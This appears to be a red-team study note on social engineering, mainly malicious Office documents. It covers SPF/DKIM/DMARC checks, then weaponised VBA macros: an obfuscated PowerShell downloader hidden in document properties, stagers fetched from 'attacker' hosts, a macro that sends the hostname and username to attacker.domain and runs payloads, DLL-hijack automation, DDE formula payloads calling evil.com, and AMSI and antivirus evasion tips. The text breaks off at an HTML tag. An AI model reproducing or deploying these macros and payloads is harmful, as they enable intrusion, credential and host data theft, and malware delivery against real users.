# 1 - Social Engineering Attack Vectors

- [1 - Social Engineering Attack Vectors](#1---social-engineering-attack-vectors)
  - [Email Delivery Fundamentals](#email-delivery-fundamentals)
    - [Sender Policy Framework (SPF)](#sender-policy-framework-spf)
    - [Domain Keys Identified Mail (DKIM)](#domain-keys-identified-mail-dkim)
    - [Domain-based Message Authentication, Reporting and Conformance (DMARC)](#domain-based-message-authentication-reporting-and-conformance-dmarc)
    - [SPAM traps](#spam-traps)
    - [Attack checklist](#attack-checklist)
  - [Macros](#macros)
    - [Referencing remote template](#referencing-remote-template)
  - [Attack vector development](#attack-vector-development)
    - [Custom macro development](#custom-macro-development)
      - [Macro leveraging file properties to hide its payload and stdin to avoid logging](#macro-leveraging-file-properties-to-hide-its-payload-and-stdin-to-avoid-logging)
      - [Using ActiveX controls from macro execution](#using-activex-controls-from-macro-execution)
      - [Certutil to decode download HTA](#certutil-to-decode-download-hta)
      - [Context aware macro](#context-aware-macro)
      - [RTF + Signed binary + DLL hijacking + Custom MSF payload](#rtf--signed-binary--dll-hijacking--custom-msf-payload)
      - [Embedding an executable in macro (executable2vbs)](#embedding-an-executable-in-macro-executable2vbs)
      - [Network-tracing macro](#network-tracing-macro)
      - [APT - Multi-stage macro malware using DNS for payload retrieval and exfiltration](#apt---multi-stage-macro-malware-using-dns-for-payload-retrieval-and-exfiltration)
      - [Macro malware performing direct shellcode injection](#macro-malware-performing-direct-shellcode-injection)
      - [Macros on PowerPoint](#macros-on-powerpoint)
      - [OLE Objects & Custom Animation](#ole-objects--custom-animation)
      - [VBA obfuscation](#vba-obfuscation)
    - [Abuse Office capabilities](#abuse-office-capabilities)
      - [Object Linking and Embedding (OLE) objects](#object-linking-and-embedding-ole-objects)
      - [MS16-032 via Excel DDE without macro](#ms16-032-via-excel-dde-without-macro)
      - [Office-handled links](#office-handled-links)
    - [Uncommon extensions](#uncommon-extensions)
      - [Microsoft Complied HTML Help file (CHM)](#microsoft-complied-html-help-file-chm)
  - [Phishing Techniques](#phishing-techniques)
    - [CSRF / Open redirects](#csrf--open-redirects)
    - [Trustworthy looking redirect form](#trustworthy-looking-redirect-form)
    - [URL Spoofing](#url-spoofing)
    - [BeEF use cases](#beef-use-cases)
    - [DYRE’s spreading method](#dyres-spreading-method)
  - [Anti-Analysis](#anti-analysis)
    - [Apache mod_rewrite](#apache-mod_rewrite)


---

## Email Delivery Fundamentals

### Sender Policy Framework (SPF)

- `MAIL FROM` - SMTP protocol itself doesn’t verify the claim
    - `SPF` to secure
        - Prerequisite:
            - Owner of the domain publishes a list of authorized sending hosts as a `TXT` record
            - The receiving mail server will check the SPF record of the domain we are stating the message is from
        - `SPF` DOESN’T verify the message’s `FROM` header

```bash
dig +short TXT <domain>
```

### Domain Keys Identified Mail (DKIM)

- Problem:  `SPF` does not verify message content
- Mail server signing a message and its contents - `DKIM-Signature` header is used

```bash
dig <selector>._domainkey.domain.com TXT
dig dkim._domainkey.domain.com TXT
```

- Strong requirement between all email receivers and senders
    - Not a manageable solution

### Domain-based Message Authentication, Reporting and Conformance (DMARC)

For domain owner to:

1. Announce DKIM and SPF usage
2. Advise other mail servers about their actions in case a message fails a check

```bash
dig +short TXT _dmarc.domain.com
```

- Require the message-receiving server actively checks for the record and acts on it.

### SPAM traps

Some factors and email components taken into consideration from spam traps when evaluating emails:

- Domain age
- Links pointing to IP addresses
- Link manipulation techniques
- Suspicious / Uncommon attachments
- Broken email content
- Values used that are different to those of the email header
- Existence of a valid and trusted SSL certificate
- Submission of the page to web content filtering sites

### Attack checklist

1. Does the domain have SPF, DKIM and DMARC record?
2. Send a message to non-existing user and analyze the non-delivery notice message’s headers for critical information
3. If spoofing is not an option, try legitimate approach - register a domain with proper SPF, DKIM and DMARC records in place

---

## Macros

Noted the following support Macros - `OfficeOpen` XML standard - validated by `WWLIB.DLL`

- DOCM
- DOTM

Note:

Renaming a `docm` file to `.rtf` - the macro will still be executed.

### Referencing remote template

- File > Options > Add-ins > Manage: Template > Go

---

## Attack vector development

### Custom macro development

#### Macro leveraging file properties to hide its payload and stdin to avoid logging

- Hide PS payload in the file’s properties (Author)
    - Note the `Author` content will be erased every time you modified the file. Do remember to insert the payload in the `Author` property
- Hide PS commands’ arguments from command line logging via invocation with `StdIn.WriteLine`
- Remember to start powershell with very quite flags:
    - `-ep bypass`
    - `-nop`
    - `-w hidden`
    - `-noni`
- `AutoOpen` is picked up by AV commonly - look for ways to trigger the macro
    - Trigger from a button?
- We can also hide the payload on custom Excel forms or working spreadsheet (in an encoded form)
- Remember to bypass AMSI
    - [https://amsi.fail/](https://amsi.fail/)

Example:

```docker
Public Sub PrintDocumentProperties()
    Dim oApp As New Excel.Application
    Dim oWB As Workbook
    Set oWB = ActiveWorkbook
    
    Dim Exec As String
    
    #If VBA7 Then
Dim rwxpage As LongPtr, res As LongPtr
##Else
Dim rwxpage As Long, res As Long
##End If

    Dim author As String
    # Accessing the file's Author property
    author = oWB.BuiltinDocumentProperties("Author")
    
    Set objWshell = VBA.CreateObject("WScript.Shell")
    
Dim c As String
Const quote As String = """"

c = "WwBTAHkAUwB0AGUAbQAuAE4AZQBUAC4AUwBlAHIAdgBpAEMAZQBQAE8ASQBOAHQATQBhAE4AYQBnAEUAUgBdADoAOgBFAFgAcABlAEMAVAAxADAAMABDAG8AbgB0AGkATgBVAEUAIAA9ACAAMAA7ACQAVwBjAD0ATgBlAFcALQBPAEIASgBFAGMAVAAgAFMAWQBTAHQAZQBNAC4ATgBlAFQALgBXAGUAYgBDAEwAaQBlAE4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAQwAuAEgARQBhAEQAZQByAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAUgBPAFgAeQAgAD0AIABbAFMAeQBTAFQARQBNAC4ATgBlAHQALgBXAEUAQgBSAEUAcQB1AEUAcwB0AF0AOgA6AEQARQBGAEEAVQBMAFQAVwBFAEIAUABSAE8AWAB5ADsAJABXAEMALgBQAFIATwBYAFkALgBDAFIARQBEAGUATgBUAEkAQQBsAHMAI"
c = c + "AA9ACAAWwBTAFkAcwBUAGUAbQAuAE4ARQB0AC4AQwByAEUAZABFAG4AVABJAEEAbABDAEEAYwBoAEUAXQA6ADoARABlAGYAQQBVAGwAdABOAEUAdAB3AG8AUgBLAEMAcgBlAGQAZQBuAHQAaQBhAGwAUwA7ACQASwA9ACcAMwBlACoARwBrAFkATABVAFMAdgA2AGEAYgA0AE8ASwAhACUAUABpAEAAJAB0AHEAOQBcAD4AfAB+AHUAKwBSACcAOwAkAGkAPQAwADsAWwBjAGgAQQBSAFsAXQBdACQAYgA9ACgAWwBjAEgAYQByAFsAXQBdACgAJABXAGMALgBEAE8AdwBOAEwATwBBAEQAUwB0AFIAaQBOAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgA3ADoAOAAwADgAMAAvAGkAbgBkAGUAeAAuAGEAcwBwACIAKQApACkAfAAlAHsAJABfAC0AYgBYAG8AcgAkAGsAWwAkAEkAKwArACUAJABLAC4ATABlAG4AZwB0AGgAXQB9ADsASQBFAFgAIAAoACQAQgAtAEoATwBJAE4AJwAnACkA"

Dim objWshell1 As Object
Set objWshell1 = CreateObject("WScript.Shell")
With objWshell1.Exec("powershell.exe -nop -windowstyle hidden -Command -")
.StdIn.WriteLine author
.StdIn.WriteBlankLines 1
.Terminate
End With
      
End Sub
```

- Note the variable `c` is not used in the macro at all
- The PS command arguments are hidden from command line logging leveraging `StdIn.WriteLine`

#### Using ActiveX controls from macro execution

- `AutoOpen()` and `Document_Open()` are easily picked up by AV
- Instead, this technique uses `InkEdit` to automatically execute its code
- `File > Options > Customize > Ribbon > Developer tab > Controls

```bash
Sub InkEdit1_GotFocus()
Run = Shell("cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://trusted.domain/file.exe',‘file.exe');Start-Process ‘file.exe'", vbNormalFocus)
End Sub
```

Procedures related to ActiveX control objects that can run a macro automatically:

- [http://www.greyhathacker.net/?p=948](http://www.greyhathacker.net/?p=948)

![Untitled](1%20-%20Social%20a2f9b/Untitled.png)

Can also leverage WMI scripting library to achieve in-memory execution.

```vbnet
Sub InkEdit1_GotFocus()
Debugging
End Sub

Public Function Debugging() As Variant
  Const HIDDEN_WINDOW = 0
  strComputer = "."
  Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  Set objStartup = objWMIService.Get("Win32_ProcessStartup")
  Set objConfig = objStartup.SpawnInstance_
  objConfig.ShowWindow = HIDDEN_WINDOW
  Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
  objProcess.Create "powe" & "rshell.x" & "xe" & "-ep bypass" & " -nop -WindowStyle Hidden -noexit -c if ([IntPtr]::size -eq 4) {(New-Object Net.WebClient).DownloadString('https://attacker/stager1.ps1') | iex } else { (New-Object Net.WebClient).DownloadString('https://attacker/stager2.ps1') | iex }"
End Function
```

- `[IntPtr]::size` returns 4 if it is a 32-bit process

#### Certutil to decode download HTA

- HTA files is a good way to evade defense - easy obfuscation

```vbnet
Sub DownloadAndExec()

Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://trusted.domain/encoded.crt", False
xHttp.Send

With bStrm
    .Type = 1 '//binary
    .Open
    .write xHttp.responseBody
    .savetofile "encoded.crt", 2 '//overwrite
End With

Shell ("cmd /c certutil -decode encoded.crt encoded.hta & start encoded.hta")

End Sub
```

- The macro takes advantage of MSXML - ServerXMLHTTP directly to fetch the encoded payload
- Certutil is used to decode the base64-encoded payload, which throw the output in an HTA format

Note the HTA can be generated by many frameworks like:

- Metasploit
- PowerShell Empire
    - Setup listener
    - `usestager hta <listener name>`
    - `execute`
    - The payload will be Base64 encoded - save as CRT file
- SET
- Unicorn

#### Context aware macro

```vbnet
'get OS, if nt else if OS X
Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long

' A Base64 Encoder/Decoder.
'
' This module is used to encode and decode data in Base64 format as described in RFC 1521.
'
' Home page: www.source-code.biz.
' License: GNU/LGPL (www.gnu.org/licenses/lgpl.html).
' Copyright 2007: Christian d'Heureuse, Inventec Informatik AG, Switzerland.
' This module is provided "as is" without warranty of any kind.

Option Explicit

Private InitDone  As Boolean
Private Map1(0 To 63)  As Byte
Private Map2(0 To 127) As Byte

' Encodes a string into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
'   S         a String to be encoded.
' Returns:    a String with the Base64 encoded data.
Public Function Base64EncodeString(ByVal s As String) As String
   Base64EncodeString = Base64Encode(ConvertStringToBytes(s))
   End Function

' Encodes a byte array into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
'   InData    an array containing the data bytes to be encoded.
' Returns:    a string with the Base64 encoded data.
Public Function Base64Encode(InData() As Byte)
   Base64Encode = Base64Encode2(InData, UBound(InData) - LBound(InData) + 1)
   End Function

' Encodes a byte array into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
'   InData    an array containing the data bytes to be encoded.
'   InLen     number of bytes to process in InData.
' Returns:    a string with the Base64 encoded data.
Public Function Base64Encode2(InData() As Byte, ByVal InLen As Long) As String
   If Not InitDone Then Init
   If InLen = 0 Then Base64Encode2 = "": Exit Function
   Dim ODataLen As Long: ODataLen = (InLen * 4 + 2) \ 3     ' output length without padding
   Dim OLen As Long: OLen = ((InLen + 2) \ 3) * 4           ' output length including padding
   Dim Out() As Byte
   ReDim Out(0 To OLen - 1) As Byte
   Dim ip0 As Long: ip0 = LBound(InData)
   Dim ip As Long
   Dim op As Long
   Do While ip < InLen
      Dim i0 As Byte: i0 = InData(ip0 + ip): ip = ip + 1
      Dim i1 As Byte: If ip < InLen Then i1 = InData(ip0 + ip): ip = ip + 1 Else i1 = 0
      Dim i2 As Byte: If ip < InLen Then i2 = InData(ip0 + ip): ip = ip + 1 Else i2 = 0
      Dim o0 As Byte: o0 = i0 \ 4
      Dim o1 As Byte: o1 = ((i0 And 3) * &H10) Or (i1 \ &H10)
      Dim o2 As Byte: o2 = ((i1 And &HF) * 4) Or (i2 \ &H40)
      Dim o3 As Byte: o3 = i2 And &H3F
      Out(op) = Map1(o0): op = op + 1
      Out(op) = Map1(o1): op = op + 1
      Out(op) = IIf(op < ODataLen, Map1(o2), Asc("=")): op = op + 1
      Out(op) = IIf(op < ODataLen, Map1(o3), Asc("=")): op = op + 1
      Loop
   Base64Encode2 = ConvertBytesToString(Out)
   End Function

' Decodes a string from Base64 format.
' Parameters:
'    s        a Base64 String to be decoded.
' Returns     a String containing the decoded data.
Public Function Base64DecodeString(ByVal s As String) As String
   If s = "" Then Base64DecodeString = "": Exit Function
   Base64DecodeString = ConvertBytesToString(Base64Decode(s))
   End Function

' Decodes a byte array from Base64 format.
' Parameters
'   s         a Base64 String to be decoded.
' Returns:    an array containing the decoded data bytes.
Public Function Base64Decode(ByVal s As String) As Byte()
   If Not InitDone Then Init
   Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s)
   Dim ILen As Long: ILen = UBound(IBuf) + 1
   If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4."
   Do While ILen > 0
      If IBuf(ILen - 1) <> Asc("=") Then Exit Do
      ILen = ILen - 1
      Loop
   Dim OLen As Long: OLen = (ILen * 3) \ 4
   Dim Out() As Byte
   ReDim Out(0 To OLen - 1) As Byte
   Dim ip As Long
   Dim op As Long
   Do While ip < ILen
      Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1
      Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1
      Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A")
      Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A")
      If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _
         Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
      Dim b0 As Byte: b0 = Map2(i0)
      Dim b1 As Byte: b1 = Map2(i1)
      Dim b2 As Byte: b2 = Map2(i2)
      Dim b3 As Byte: b3 = Map2(i3)
      If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _
         Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
      Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10)
      Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4)
      Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3
      Out(op) = o0: op = op + 1
      If op < OLen Then Out(op) = o1: op = op + 1
      If op < OLen Then Out(op) = o2: op = op + 1
      Loop
   Base64Decode = Out
   End Function

Private Sub Init()
   Dim C As Integer, i As Integer
   ' set Map1
   i = 0
   For C = Asc("A") To Asc("Z"): Map1(i) = C: i = i + 1: Next
   For C = Asc("a") To Asc("z"): Map1(i) = C: i = i + 1: Next
   For C = Asc("0") To Asc("9"): Map1(i) = C: i = i + 1: Next
   Map1(i) = Asc("+"): i = i + 1
   Map1(i) = Asc("/"): i = i + 1
   ' set Map2
   For i = 0 To 127: Map2(i) = 255: Next
   For i = 0 To 63: Map2(Map1(i)) = i: Next
   InitDone = True
   End Sub

Private Function ConvertStringToBytes(ByVal s As String) As Byte()
   Dim b1() As Byte: b1 = s
   Dim l As Long: l = (UBound(b1) + 1) \ 2
   If l = 0 Then ConvertStringToBytes = b1: Exit Function
   Dim b2() As Byte
   ReDim b2(0 To l - 1) As Byte
   Dim p As Long
   For p = 0 To l - 1
      Dim C As Long: C = b1(2 * p) + 256 * CLng(b1(2 * p + 1))
      If C >= 256 Then C = Asc("?")
      b2(p) = C
      Next
   ConvertStringToBytes = b2
   End Function

Private Function ConvertBytesToString(b() As Byte) As String
   Dim l As Long: l = UBound(b) - LBound(b) + 1
   Dim b2() As Byte
   ReDim b2(0 To (2 * l) - 1) As Byte
   Dim p0 As Long: p0 = LBound(b)
   Dim p As Long
   For p = 0 To l - 1: b2(2 * p) = b(p0 + p): Next
   Dim s As String: s = b2
   ConvertBytesToString = s
   End Function
Function GetHTTPResult(sURL As String) As String
        Dim XMLHTTP As Variant, sResult As String
    
        Set XMLHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
        XMLHTTP.Open "GET", sURL, False
        XMLHTTP.Send
        Debug.Print "Status: " & XMLHTTP.Status & " - " & XMLHTTP.StatusText
        sResult = XMLHTTP.ResponseText
        Debug.Print "Length of response: " & Len(sResult)
        Set XMLHTTP = Nothing
        GetHTTPResult = sResult
    End Function

Private Sub Workbook_Open()

Dim result As String
Dim position As Integer
Dim hostname As String
Dim username As String
Dim etc_host As String
Dim text As String
Dim aLine As String
Dim aURL As String
Dim uResult As String
Dim encoded As String
Dim FileNum As Integer
Dim aFile As String
Dim command As String
Dim exec_string As String

result = Application.OperatingSystem
position = InStr(result, "Macintosh")

If position = 0 Then
    ' Using windows'
    'MsgBox "Microsoft Excel is using Windows " & position
    hostname = Environ$("computername")
    username = Environ$("username")
    'MsgBox "test: " & hostname & " " & username
    Dim sURL As String, sResult As String
    Dim oResult As Variant, oData As Variant, R As Long, C As Long
    
    text = hostname & " " & username
    encoded = Base64EncodeString(text)
    sURL = "http://XX.XX.XX.XX:80/" & encoded
    'MsgBox "URL: " & sURL
    sResult = GetHTTPResult(sURL)
    sResult = GetHTTPResult("http://attacker.domain/payload_windows")
    'Debug.Print sResult
    command = "powershell.exe -NoP -sta -NonI -W Hidden -Enc " & sResult
    'Debug.Print command
    result = Shell(command)
    
Else
    aURL = "http://attacker.domain/"
    result = system("/usr/bin/python -c 'import socket,os,base64,urllib2;urllib2.urlopen(" & Chr(34) & aURL & Chr(34) & " + base64.b64encode(socket.gethostname() + " & Chr(34) & " " & Chr(34) & " + os.environ[" & Chr(34) & "USER" & Chr(34) & "]))'")
    Debug.Print result
    result = system("/usr/bin/python -c 'import socket,os,base64,urllib2;exec(urllib2.urlopen(" & Chr(34) & "http://attacker.domain/payload_osx" & Chr(34) & ").read())' &")
       
End If

End Sub
```

- macOS payload - https://github.com/EmpireProject/EmPyre

#### RTF + Signed binary + DLL hijacking + Custom MSF payload

- [ATT&CK: DLL Hijacking](https://attack.mitre.org/techniques/T1574/001/)

- RTF with embedded OLE objects - when the file is opened, they automatically drop the embedded OLE objects into the `TEMP` folder.
    - If we can find a trusted / signed binary, which is vulnerable to DLL hijacking, we can embed both the trusted binary and the malicious DLL in an RTF file.
    - When the RTf is opened, both of them will be dropped in the `TEMP` directory
- This technique creates large on-disk footprint - make sure our malicious DLL can evade AV
    - Custom meterpreter loader
- Example vulnerable exe:  Kaspersky’s `kavremover.exe`

Rafael Mudge’s Metasploit loader:

- [https://github.com/rsmudge/metasploit-loader/blob/master/src/main.c](https://github.com/rsmudge/metasploit-loader/blob/master/src/main.c)

Customization:

- [https://astr0baby.wordpress.com/2014/02/12/custom-meterpreter-loader-dll/](https://astr0baby.wordpress.com/2014/02/12/custom-meterpreter-loader-dll/)
- [https://astr0baby.wordpress.com/2014/02/13/customising-meterpreter-loader-dll-part-2/](https://astr0baby.wordpress.com/2014/02/13/customising-meterpreter-loader-dll-part-2/)

But, RTF does not support macros. To automate the attack:

```vbnet
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr) 'For 64 Bit Systems'

Sub AutoOpen()
Dim executable As String

temp_path = Environ("TEMP") + "\"

RTF_EXTENSION = ".rtf"
qwerty = temp_path + "save_as_rtf" + RTF_EXTENSION

Selection.WholeStory
  Selection.Copy
  Documents.Add Template:="Normal", NewTemplate:=False, DocumentType:=0
  Selection.PasteAndFormat (wdPasteDefault)
  ActiveDocuments.SaveAs FileName:=qwerty, FileFormat:= _
    wdFormatRTF, LockComments:=False, Password:="", AddToRecentFiles:= _
    True, WritePassword:="", ReadOnlyRecommended:=False, EMbedTrueTypeFonts:= _    
    False, SaveNativePictureFormat:=False, SaveFormsData:=False, _    
    SavesAOCELetter:=False
  Sleep (2)

Application.Documents("clone_as_rtf.rtf").Close (Word.WdSaveOptions.wdDoNotSaveChanges)
Sleep (2)
Shell ("cmd /c start winword %TEMP%/save_as_rtf.rtf & timeout 5 & %TEMP%\kavremover.exe")
End Sub
```

- The `Selection.WholeStory` section save the current document as an RTF into `%TEMP%`
- `Application.Documents...` - when the current document is saved, the RTF file is opened automatically. However, it won’t make the embedded OLE objects dropped into `%TEMP%`. Therefore, we need to programmatically access and close the created RTF.
- `Shell ....` programmatically reopens the created RTF file, and executing `kavremover.exe` to trigger the DLL hijacking vulnerability.

#### Embedding an executable in macro (executable2vbs)

#### Network-tracing macro

- PS Networking Sniffing - [https://devblogs.microsoft.com/scripting/packet-sniffing-with-powershell-getting-started/](https://devblogs.microsoft.com/scripting/packet-sniffing-with-powershell-getting-started/)

```vbnet
Function CSV_Import(strFile)
    Dim ws As Worksheet
    Set ws = ActiveWorkbook.Sheets("Sheet1")
    With ws.QueryTables.Add(Connection:="TEXT;" & strFile, Destination:=ws.Range("A1"))
     .TextFileParseType = xlDelimited
     .TextFileCommaDelimiter = True
     .Refresh
    End With
    ActiveWorkbook.Saved = True
End Function

Function network_trace(secs)
    If secs = 0 Then secs = 2
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile("c:\windows\temp\network_trace.ps1", True)
    objFile.Write "$IsAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]""Administrator"")" & vbCrLf
    objFile.Write "if (-not $IsAdmin) {" & vbCrLf
    objFile.Write "    $cmd = $MyInvocation.MyCommand.Path + "" $args""" & vbCrLf
    objFile.Write "    $arguments = ""-windowstyle hidden -NoProfile -Command """"& {$cmd} """"""" & vbCrLf
    objFile.Write "    $proc = Start-Process ""$psHome\powershell.exe"" -Verb Runas -ArgumentList $arguments -ErrorAction 'stop'" & vbCrLf
    
    objFile.Write "    $proc.WaitForExit()" & vbCrLf
    objFile.Write "    Break" & vbCrLf
    objFile.Write "}" & vbCrLf
    objFile.Write "New-NetEventSession -Name “Session1” -CaptureMode SaveToFile -LocalFilePath ""C:\windows\temp\packets.etl""" & vbCrLf
    objFile.Write "Add-NetEventProvider -Name “Microsoft-Windows-TCPIP” -SessionName “Session1”" & vbCrLf
    objFile.Write "Start-NetEventSession -Name “Session1”" & vbCrLf
    objFile.Write "Start-Sleep -s $args[0]" & vbCrLf
    objFile.Write "tracerpt c:\windows\temp\packets.etl -o c:\windows\temp\packets.csv -of csv -y -rl 5" & vbCrLf
    objFile.Write "Stop-NetEventSession -Name session1" & vbCrLf
    objFile.Write "Remove-NetEventSession" & vbCrLf
    objFile.Write "Get-Content c:\windows\temp\packets.csv" & vbCrLf
    objFile.Close
    Set objShell = CreateObject("Wscript.shell")
    objShell.Run "powershell -windowstyle hidden -file c:\windows\temp\network_trace.ps1 " & Str(secs), 0, True
    CSV_Import "c:\windows\temp\packets.csv"
End Function

Private Sub Workbook_Open()
    network_trace 2
End Sub
```

#### APT - Multi-stage macro malware using DNS for payload retrieval and exfiltration

- Embedded encoded malicious scripts - dropped various files on the host
- Perform enumeration activities and uses DNS for both payload retrieval and exfiltration purpose
- [https://gist.githubusercontent.com/anonymous/d0da355e5c21a122866808d37234cd5d/raw/61d4537d37390d9d5bb25e751b358207e56c090c/gistfile1.txt](https://gist.githubusercontent.com/anonymous/d0da355e5c21a122866808d37234cd5d/raw/61d4537d37390d9d5bb25e751b358207e56c090c/gistfile1.txt)

```vbnet
Sub Init()
  Set UpdateVbs = ActiveWorkbook.Worksheet("Incompatible").Cell(1,25)
  Set DnsPS1 = ActiveWorkbook.Worksheet("Incompatible").Cell(1,26)
```

- Retrieve base-64 content from specified cells in a worksheet called “Incompatible”

```vbnet
If Not (fso.FileExists(wss.ExpandEnvironmentString("%PUBLIC%") & "\Libraries\update.vbs")) Then
    fso.CreateFolder (wss.ExpandEnvironmentStrings("%PUBLIC%") & "\Libraries\up")
 ....
```

- Perform a presence check regarding a file at the path `%PUBLIC%\Libraries\update.vbs`
- If missing, create some directories in `%PUBLIC%\Libraries`

```vbnet
cmd = "powershell ""&{$f][System.Text.Encoding]::UTF8.GetString........
```

- Decode base64 content (obtained from the worksheet). Drop the decoded content to `%PUBLIC%\Libraries\update.vbs` and `%PUBLIC%\Libraries\dns.ps1`

```vbnet
wss.Run "schtasks /create /F /sc minute /mo 3 /tn " & Chr(34) & "GoogleUpdateTaskMachineUI" & Chr(34) & " /tr" & wss.ExpandEnvironmentSettings("%PUBLIC%") & "\Libraries\update.vbs", 0

```

- Create schedule task

```vbnet
Sub ShowHideSheets()
  If ActiveWorkbook.Worksheets(1).Visible then
    Dim WS_Count As Integer
    Dim I As Integer
    WS_Count = ActiveWorkbook.Worksheets.Count
    For I = 1 to WS_Count
      ActiveWorkbook.Worksheets(I).Visible = True
    Next I
    ActiveWorkbook.Worksheets(1).Visible = False    
    ActiveWorkbook.Worksheets(2).Activate
  End If
```

- Display additional spreadsheet data when the user enables macros

DNS through powershell references:

- [http://www.labofapenetrationtester.com/2015/01/fun-with-dns-txt-records-and-powershell.html](http://www.labofapenetrationtester.com/2015/01/fun-with-dns-txt-records-and-powershell.html)
- [https://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.html](https://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.html)

#### Macro malware performing direct shellcode injection

- Not easy to obfuscate and easy to be picked by AV
- [https://labs.f-secure.com/assets/BlogFiles/one-template-to-rule-them-all-t2.pdf](https://labs.f-secure.com/assets/BlogFiles/one-template-to-rule-them-all-t2.pdf)

#### Macros on PowerPoint

- Run macros on PowerPoint **Custom Actions**
- `File > Options > Customize Ribbon > Developer tab`
    - Insert > Choose Module
    - Mouse Click / Mouse Over
- Without using Custom Actions, can add an Office 2007 Custom UI part
    - Insert the module needed and save the ppt as macro-supporting PPT type
    - Unzip the PPT
    - Edit `_rels/.rels` file and add the following line right before the last `</Relationship>`:
    
    ```vbnet
    <Relationship Type=http://schemas.microsoft.com/office/2006/relationships/ui/extensibility Target="/customUI/customUI.xml" Id="Rd6e72c29d34a427e" />
    ```
    
    - Create a new directory on the same level as the `_rels` directory called `customUI`
    - Insider `customUI` directory, create `customUI.xml` with the content:
    
    ```vbnet
    <customUI xmlns=http://schemas.microsoft.com/office/2006/01/customui onLoad="name of your VBA module"></customUI>
    ```
    
    - Zip the whole directory and rename it to the filename you used to save the PPT

#### OLE Objects & Custom Animation

- Cool if macros are disabled globally

#### VBA obfuscation

[https://github.com/Pepitoh/Vbad](https://github.com/Pepitoh/Vbad)

---

### Abuse Office capabilities

#### Object Linking and Embedding (OLE) objects

- In globally macros disabled environment, we can abuse legitimate OLE capability to trick users enable and download malicious content
- OLE - allows embedding and linking to documents and other object
    - e.g. embed a spreadsheet in a word document
        - When the Word document is displaying the content, it establishes the spreadsheet data belongs to the spreadsheet application
- We can use OLD to embed malicious office docs, VBS, JS, EXE, HTA, CHM, ...
- We can also customize both the extension and the icon for social engineering

- `Insert > Object`
    - On object type list, choose package and locate the file to embed.
    - Choose the OLE object you embed. Go to `Animation > Add Navigation`, from the dropdown, choose `OLE Action verbs` and click `Activate Contents`
    - Again on `Animation` tab, choose `Animation Pane`. Navigate to `Animation pane`, you should see `Object`. Click on the down arrow at the right side of the object to activate a drop dow menu and choose `Start After Previous` option.
    - By the time the user open the PPSM powerpoint file, the OLE object embed will be triggered and a dialog will appear requesting the user’s consent to execute the embedded object

#### MS16-032 via Excel DDE without macro

DDE sends messages between applications that share data and uses shared memory to exchange data between applications

- [https://www.contextis.com/en/blog/comma-separated-vulnerabilities](https://www.contextis.com/en/blog/comma-separated-vulnerabilities)

Example:

Content in spreadsheet cell:

```vbnet
cmd|/c calc.exe'!A1
```

- Excel executes the 1st part of the payload (cmd.exe), the second part will be the arguments for cmd.exe
- Note the argument should be in single quote `'`
- Cannot be used with powershell

Instead, pass PowerShell as an argument to cmd.exe:

```vbnet
=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"https://..../script\"); powershell -e $e'!A1
```

```vbnet
=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"https://..../script\"); ine $e'!A1
```

```vbnet
=cmd|'/c \\evil.com\sp.bat; iex $e'!A1
```

References:

- [https://web.archive.org/web/20161110175230/https:/technet.microsoft.com/en-us/library/security/ms16-032.aspx](https://web.archive.org/web/20161110175230/https:/technet.microsoft.com/en-us/library/security/ms16-032.aspx)
- [https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html](https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html)
- PS exploit:  [https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Invoke-MS16-032.ps1](https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Invoke-MS16-032.ps1)
- Remotely load and execute the exploit:
[https://gist.github.com/ssherei/41eab0f2c038ce8b355acf80e9ebb980](https://gist.github.com/ssherei/41eab0f2c038ce8b355acf80e9ebb980)

#### Office-handled links

When a user clicks on an HTML page having the following format, MS word will be run to handle the opening the served document:

```vbnet
<html>
